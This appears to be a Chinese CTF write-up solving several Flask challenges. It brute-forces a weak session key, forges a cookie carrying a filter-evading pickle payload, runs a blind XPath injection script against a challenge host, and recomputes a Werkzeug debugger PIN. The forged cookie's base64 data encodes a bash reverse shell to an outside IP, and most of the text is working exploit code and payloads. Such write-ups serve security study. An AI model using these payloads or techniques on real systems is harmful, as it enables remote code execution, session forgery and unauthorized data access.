题目源代码如下
import base64
import pickle
from flask import Flask, session
import os
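import random

app = Flask(__name__)
# SECURITY: os.urandom(2) is two bytes -> 16 bits of entropy, rendered as 4 lowercase hex
# characters. The whole key space is 16**4 = 65536 strings, so the session signature can be
# brute-forced offline and the cookie re-signed with arbitrary contents.
app.config['SECRET_KEY'] = os.urandom(2).hex()


@app.route('/')
def hello_world():
    """Issue a random 5-letter 'user' value built from the letters of "admin" and greet it."""
    if not session.get('user'):
        # choices() samples with replacement, so "admin" itself is one outcome in 5**5; with the
        # weak SECRET_KEY above, forging the cookie is far cheaper than waiting for it.
        session['user'] = ''.join(random.choices("admin", k=5))
    return 'Hello {}!'.format(session['user'])


@app.route('/admin')
def admin():
    """Unpickle the base64 'ser_data' session value once the session claims user == "admin"."""
    if session.get('user') != "admin":
        return f"<script>alert('Access Denied');window.location.href='/'</script>"
    else:
        try:
            # The blacklist is evaluated on a REWRITTEN copy: "os" -> "Os", "builtin" ->
            # "BuIltIn", "bytes" -> "Bytes" remove the lowercase letters the next line looks for.
            a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
            # Intended to ban the REDUCE (R), INST (i), OBJ (o) and BUILD (b) opcodes ...
            if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
                raise pickle.UnpicklingError("R i o b is forbidden")
            # ... but the ORIGINAL bytes are what gets unpickled. A trailing "os." reads "Os."
            # to the filter yet executes as OBJ, SETITEM, STOP, and "cos\nsystem" survives as
            # "cOs\nsystem". SECURITY: pickle.loads on attacker-controlled data is code execution.
            pickle.loads(base64.b64decode(session.get('ser_data')))
            return "ok"
        except:
            # bare except: any failure (bad base64, filter hit, unpickling error) looks the same
            return "error!"


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8888)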
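# Wordlist for brute-forcing the Flask session signature. The target's SECRET_KEY is
# os.urandom(2).hex(): every 4-character lowercase hex string, 16**4 = 65536 candidates.
# Letters first, then digits, to keep the same line order as the original nested loops.
HEX_DIGITS = "abcdef0123456789"
WORDLIST_PATH = "C:/Users/Administrator/Desktop/easypickle/zidian.txt"


def candidate_keys(alphabet: str = HEX_DIGITS, length: int = 4):
    """Yield every string of ``length`` characters drawn (with repetition) from ``alphabet``.

    Order is lexicographic in ``alphabet`` order, i.e. the first character varies slowest.
    """
    import itertools  # function-scope: this listing has no import block of its own

    for combo in itertools.product(alphabet, repeat=length):
        yield "".join(combo)


def write_wordlist(path: str = WORDLIST_PATH) -> int:
    """Write one candidate key per line to ``path`` and return the number of lines written.

    Uses a ``with`` block so the file is flushed and closed even if writing fails; the
    original opened the handle and never closed it.
    """
    count = 0
    with open(path, "w") as wordlist:
        for key in candidate_keys():
            wordlist.write(f"{key}\n")
            count += 1
    return count


if __name__ == "__main__":
    write_wordlist()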
flask-unsign --unsign --cookie "eyJ1c2VyIjoiYWRtaW4ifQ.YyVFUA.RSTsbveITHMSD9v0MTLMswCryRc" --wordlist "C:\Users\Administrator\Desktop\easypickle\zidian.txt" --no-literal-eval
[*] Session decodes to: {'user': 'admin'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 24960 attempts
b'6174'
import pickle
import base64
import os
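# Hand-written pickle opcode stream (see the pickletools dump that follows):
#   (  S'shanghe'  S'shanghe'  d    -> MARK, two strings, DICT: a dict on the stack
#   (  S'shanghe'  S'shanghe'  d    -> a second dict
#   (  cos\nsystem  S'dir'  o        -> GLOBAL os.system, the argument, OBJ: calls os.system('dir')
#   s  .                              -> SETITEM into the first dict, STOP
# Why 'o' (OBJ) instead of the usual 'R' (REDUCE): the server rewrites "os" -> "Os" before
# testing for the byte 'o', so the trailing "os." survives the check as "Os." but is still
# unpickled from the untouched bytes. NOTE(review): 'dir' contains 'i', which the same filter
# rejects, so this variant only works for the local test below; the payload actually sent
# later spells the command with the V (UNICODE) opcode and \u escapes instead.
# NOTE(review): after OBJ the second dict is what SETITEM pops as the key; the later variant
# uses a plain string key instead.
code = b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''
code = base64.b64encode(code)
print(code)
# pickle.loads(base64.b64decode(code))  # executes os.system('dir') -- only on a throwaway machine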
C:\Users\Administrator\Desktop\easypickle\venv\Scripts\python.exe C:/Users/Administrator/Desktop/easypickle/3.py
code=b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''
    0: ( MARK
1: S STRING 'shanghe1'
12: S STRING 'shanghe' #这里的意思是压进去第一个字典
23: d DICT (MARK at 0)
24: ( MARK
25: S STRING 'shanghe2'
36: S STRING 'shanghe'
47: d DICT (MARK at 24) #再往栈里面压进去第二个字典
48: ( MARK
49: c GLOBAL 'os system'
60: S STRING 'dir'
67: o OBJ (MARK at 48) #这里用我们逃出来的o指令进行命令执行
68: s SETITEM #最后s的指令就会把 o指令执行后的内容以及shanghe2的键值对压进去shanghe1的字典里面,作为新的键值对。
69: . STOP
highest protocol among opcodes = 1
import pickle
import base64
import os
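# Second variant: one dict, a string key, then GLOBAL os.system + argument + OBJ, SETITEM, STOP.
#   (  S'shanghe'  S'shanghe'  d     -> dict
#   S'shanghe'                         -> key for the SETITEM below
#   (  cos\nsystem  S'cat f* >xxx'  o  -> os.system('cat f* >xxx')
#   s  .                               -> dict['shanghe'] = result; STOP
# The S opcode's argument runs to the end of the line, so a '\n' is required before "os.".
# The original listing omitted it (the stream would end inside the string argument); the
# base64 payload used in the actual request does contain the newline.
# Filter check: after the server's "os" -> "Os" rewrite none of R, i, o, b remain in the bytes
# ('cOs', 'system', 'shanghe', 'cat f* >xxx', 'Os.').
code = b'''(S'shanghe'\nS'shanghe'\ndS'shanghe'\n(cos\nsystem\nS'cat f* >xxx'\nos.'''
code = base64.b64encode(code)
print(code)
# pickle.loads(base64.b64decode(code))  # would run the command -- keep commented out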
python3 flask_session_cookie_manager3.py encode -s "6174" -t "{'user': 'admin','ser_data':b'KFMnc2hhbmdoZScKUydzaGFuZ2hlJwpkUydzaGFuZ2hlJwooY29zCnN5c3RlbQpWXHUwMDYyXHUwMDYxXHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDYzXHUwMDIwXHUwMDI3XHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDY5XHUwMDIwXHUwMDNFXHUwMDI2XHUwMDIwXHUwMDJGXHUwMDY0XHUwMDY1XHUwMDc2XHUwMDJGXHUwMDc0XHUwMDYzXHUwMDcwXHUwMDJGXHUwMDM0XHUwMDM3XHUwMDJFXHUwMDM5XHUwMDM2XHUwMDJFXHUwMDM0XHUwMDMxXHUwMDJFXHUwMDMxXHUwMDMwXHUwMDMzXHUwMDJGXHUwMDMxXHUwMDMzXHUwMDMzXHUwMDM3XHUwMDIwXHUwMDMwXHUwMDNFXHUwMDI2XHUwMDMxXHUwMDI3Cm9zLg=='}
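url = "http://eci-2zeck6h5lu4htf36m573.cloudeci1.ichunqiu.com:8888/hello"
# Candidate characters for the blind extraction. The original alphabet skipped 'i'
# ("...ghjk..."), so any value containing an 'i' could never be recovered; it is restored here.
string = "abcdefghijklmnopqrstuvwxyz1234567890{}-_"

# Enumeration steps already performed with the same true/false oracle (kept for reference):
#   -1'or substring(name(/*[1]), {j}, 1)='{i}' or '0'='             -> root
#   -1'or substring(name(/root/*[1]), {j}, 1)='{i}' or '0'='        -> user
#   -1'or substring(name(/root/user/*[1]), {j}, 1)='{i}' or '0'='   -> username


def _oracle(position: int, char: str) -> bool:
    """Ask the server whether character ``position`` (1-based) of the target node equals ``char``.

    Boolean-based blind XPath injection: the injected predicate is true only for the right
    character, and a true predicate makes the page render user1's entry.
    """
    import requests  # imported lazily so getstr() can be exercised without the network dependency

    payload = f"-1'or substring((//root[position()=1]/user[position()=1]/username[position()=2]),{position},1)='{char}' or '0'='"
    data = {"xpath": payload}
    r = requests.post(url, data=data)
    return "<p>user1</p>" in r.text


def getstr(probe=None):
    """Recover the second <username> one character at a time; print progress and return it.

    ``probe(position, char) -> bool`` defaults to the live ``_oracle``. Positions 1..49 are
    tried as in the original; once a character matches, the remaining candidates for that
    position are skipped (the original kept sending them).
    """
    probe = _oracle if probe is None else probe
    result = ""
    for j in range(1, 50):
        for i in string:
            if probe(j, i):
                result += i
                print(result)
                break
    print("++++++++++++++++++++++++++++")
    return result


if __name__ == "__main__":
    getstr()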
题目源代码如下
import os
import re
from hashlib import md5
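from flask import Flask, redirect, request, render_template, url_for, make_response

app = Flask(__name__)


def extractFile(filepath):
    """Unzip ``filepath`` into a directory of the same name and redirect to its listing."""
    # 'uploads/<ip4>/<name4>.zip' -> 'uploads/<ip4>/<name4>'
    extractdir = filepath.split('.')[0]
    if not os.path.exists(extractdir):
        os.makedirs(extractdir)
    # filepath is built from two md5 prefixes, so it carries no shell metacharacters, but the
    # extraction itself is unrestricted: nothing rejects entries whose names or link targets
    # point outside extractdir. NOTE(review): whatever unzip produces here, display() serves.
    os.system(f'unzip -o {filepath} -d {extractdir}')
    return redirect(url_for('display', extractdir=extractdir))


@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')


@app.route('/display', methods=['GET'])
@app.route('/display/', methods=['GET'])
@app.route('/display/<path:extractdir>', methods=['GET'])
def display(extractdir=''):
    """Serve a file, or an HTML listing of a directory, named relative to the working directory.

    The only path check is a '..' blacklist; the path is otherwise used as-is, so anything
    reachable below the cwd (including through links left behind by unzip) can be read.
    """
    if re.search(r"\.\.", extractdir, re.M | re.I) is not None:
        return "Hacker?"
    else:
        if not os.path.exists(extractdir):
            return make_response("error", 404)
        else:
            if not os.path.isdir(extractdir):
                # 'with' closes the handle; the original never did
                with open(extractdir, 'rb') as f:
                    response = make_response(f.read())
                response.headers['Content-Type'] = 'application/octet-stream'
                return response
            else:
                fn = os.listdir(extractdir)
                fn = [".."] + fn
                with open("templates/template.html") as f:
                    x = f.read()
                ret = "<h1>文件列表:</h1><br><hr>"
                for i in fn:
                    tpath = os.path.join('/display', extractdir, i)
                    # entry names come straight from the uploaded archive and are interpolated
                    # without escaping -> stored XSS in the listing
                    ret += "<a href='" + tpath + "'>" + i + "</a><br>"
                x = x.replace("HTMLTEXT", ret)
                return x


@app.route('/upload', methods=['GET', 'POST'])
def upload():
    """Accept a .zip upload into a per-client directory and extract it."""
    ip = request.remote_addr
    # only 4 hex chars of md5(ip): clients whose prefixes collide share (and overwrite) a directory
    uploadpath = 'uploads/' + md5(ip.encode()).hexdigest()[0:4]
    if not os.path.exists(uploadpath):
        os.makedirs(uploadpath)
    if request.method == 'GET':
        return redirect('/')
    if request.method == 'POST':
        try:
            upFile = request.files['file']
            print(upFile.filename)
            # extension check only; the content is never validated as an archive
            if os.path.splitext(upFile.filename)[-1] == '.zip':
                filepath = f"{uploadpath}/{md5(upFile.filename.encode()).hexdigest()[0:4]}.zip"
                upFile.save(filepath)
                zipDatas = extractFile(filepath)
                return zipDatas
            else:
                return f"{upFile.filename} is not a zip file !"
        except:
            # bare except: every failure mode collapses into a 404
            return make_response("error", 404)


if __name__ == '__main__':
    # SECURITY: debug=True bound to 0.0.0.0 exposes the Werkzeug debugger; its PIN is derived
    # from values (/etc/passwd user, MAC address, machine-id, app path) that the unrestricted
    # file read in display() can disclose.
    app.run(host='0.0.0.0', port=8000, debug=True)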
https://blog.csdn.net/weixin_54648419/article/details/123632203
#sha1
import hashlib
from itertools import chain
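def werkzeug_pin(probably_public_bits, private_bits):
    """Recompute the Werkzeug debugger PIN (SHA-1 variant) from the values the debugger hashes.

    ``probably_public_bits``: username, module name, app name, path of flask/app.py.
    ``private_bits``: MAC address as a decimal integer string, then the machine id.
    Empty bits are skipped; ``str`` bits are UTF-8 encoded. Returns the 9-digit PIN grouped
    as 'ddd-ddd-ddd' (5 and 4 are tried first, but 9 digits only divide by 3).
    """
    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')
    # the debugger derives its cookie name ('__wzd' + hexdigest[:20]) here; not needed for the PIN
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            return '-'.join(num[x:x + group_size].rjust(group_size, '0')
                            for x in range(0, len(num), group_size))
    return num


probably_public_bits = [
    # NOTE(review): the original listing had no comma after 'ctf', so 'ctf' and 'flask.app'
    # were concatenated into a single list element. Because sha1.update() streams, the digest
    # happened to be unchanged, but the list was malformed (3 bits instead of 4).
    'ctf',  # user running the app, from /etc/passwd
    'flask.app',  # default module name
    'Flask',  # default app name
    '/usr/local/lib/python3.8/site-packages/flask/app.py'  # taken from an error page
]
private_bits = [
    '95532922527',  # /sys/class/net/eth0/address, hex -> decimal
    '96cec10d3d9307792745ec3b85c896209361435ac3de86b68f6b5282b8bc57435c57c9096554c72c7f5a5bc591939427'  # /etc/machine-id followed by the id from /proc/self/cgroup
]

if __name__ == '__main__':
    print(werkzeug_pin(probably_public_bits, private_bits))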